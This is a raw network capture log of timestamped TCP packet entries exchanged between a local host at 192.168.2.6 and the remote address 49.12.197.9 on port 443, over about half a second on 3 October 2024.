                                                                                                                                                                  Oct 3, 2024 03:36:18.842708111 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.851336956 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.851382017 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.851495981 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.851511955 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.851560116 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.851581097 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.861175060 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.861248970 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.861351967 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.861366987 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.861422062 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.876096964 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.876143932 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.876250029 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.876267910 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.876292944 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.876312971 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.877266884 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.877306938 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.877345085 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.877357006 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.877382994 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.877402067 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.885235071 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.885281086 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.885426044 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.885446072 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.885474920 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.885499001 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.904876947 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.904896975 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.905061960 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.905093908 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.905141115 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.916763067 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.916809082 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.916882038 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.916889906 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.916945934 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.916945934 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.929070950 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.929094076 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.929218054 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.929231882 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.929275036 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.938122988 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.938184023 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.938273907 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.938302040 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.938324928 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.938344002 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.948370934 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.948426962 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.948539972 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.948556900 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.948615074 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.948616028 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.963676929 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.963743925 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.963936090 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.963937044 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.963993073 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.964057922 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.964356899 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.964406013 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.964437008 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.964449883 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.964478016 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.964504004 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.971728086 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.971751928 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.971832037 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.971839905 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.971870899 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.971888065 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.991838932 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.991871119 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.991993904 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.992006063 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.992053032 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.003633976 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.003659010 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.003740072 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.003750086 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.003793955 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.016154051 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.016179085 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.016278982 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.016288996 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.016331911 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.024852037 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.024888039 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.024991989 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.025001049 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.025046110 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.035258055 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.035286903 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.035356045 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.035368919 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.035398006 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.035413027 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.050256968 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.050312042 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.050379038 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.050390005 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.050416946 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.050436020 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.051141024 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.051184893 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.051214933 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.051222086 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.051249027 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.051263094 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.058800936 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.058845997 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.058898926 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.058908939 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.058934927 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.058952093 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.078593969 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.078638077 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.078707933 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.078721046 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.078749895 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.078769922 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.090389967 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.090435982 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.090503931 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.090517044 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.090531111 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.090559959 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.103005886 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.103049994 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.103140116 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.103154898 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.103190899 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.103209972 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.111699104 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.111758947 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.111805916 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.111818075 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.111839056 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.111855030 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.122024059 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.122045040 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.122123957 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.122134924 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.122174978 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.137411118 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.137454987 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.137527943 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.137541056 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.137569904 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.137588024 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.138098001 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.138142109 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.138185024 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.138197899 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.138225079 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.138246059 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.147459984 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.147502899 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.147561073 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.147579908 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.147612095 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.147630930 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.165399075 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.165421963 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.165570974 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.165581942 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.165630102 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.177174091 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.177195072 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.177289963 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.177299976 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.177345037 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.189829111 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.189860106 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.189960957 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.189971924 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.190012932 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.198666096 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.198689938 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.198769093 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.198776960 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.198818922 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.208952904 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.208975077 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.209050894 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.209057093 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.209096909 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.224250078 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.224272013 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.224359989 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.224368095 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.224409103 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.224838018 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.224854946 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.224919081 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.224925995 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.224967957 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.234308004 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.234424114 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.234438896 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.234477997 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.234498024 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.234518051 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.252435923 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.252485037 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.252521992 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.252547979 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.252572060 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.252614021 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.264131069 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.264174938 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.264266968 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.264280081 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.264338017 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.276607990 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.276652098 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.276807070 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.276823997 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.276952982 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.285731077 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.285773993 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.285839081 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.285851002 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.285881042 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.285901070 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.296941042 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.296986103 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.297050953 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.297063112 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.297101974 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.297122002 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.310995102 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.311039925 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.311249971 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.311249971 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.311285973 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.311404943 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.311964035 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.311985970 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.312050104 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.312056065 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.312083006 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.312098980 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.320928097 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.320945024 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.321037054 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.321043968 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.321084976 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.339006901 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.339021921 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.339106083 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.339122057 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.339165926 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.350910902 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.350935936 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.351027966 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.351039886 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.351080894 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.363341093 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.363357067 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.363451004 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.363459110 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.363501072 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.372534037 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.372558117 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.372714996 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.372751951 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.372801065 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.383730888 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.383752108 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.383908033 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.383923054 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.383977890 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.397913933 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.397933006 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.398025990 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.398039103 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.398094893 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.398646116 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.398663998 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.398749113 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.398761988 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.398817062 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.408077955 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.408092976 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.408250093 CEST49738443192.168.2.649.12.197.9
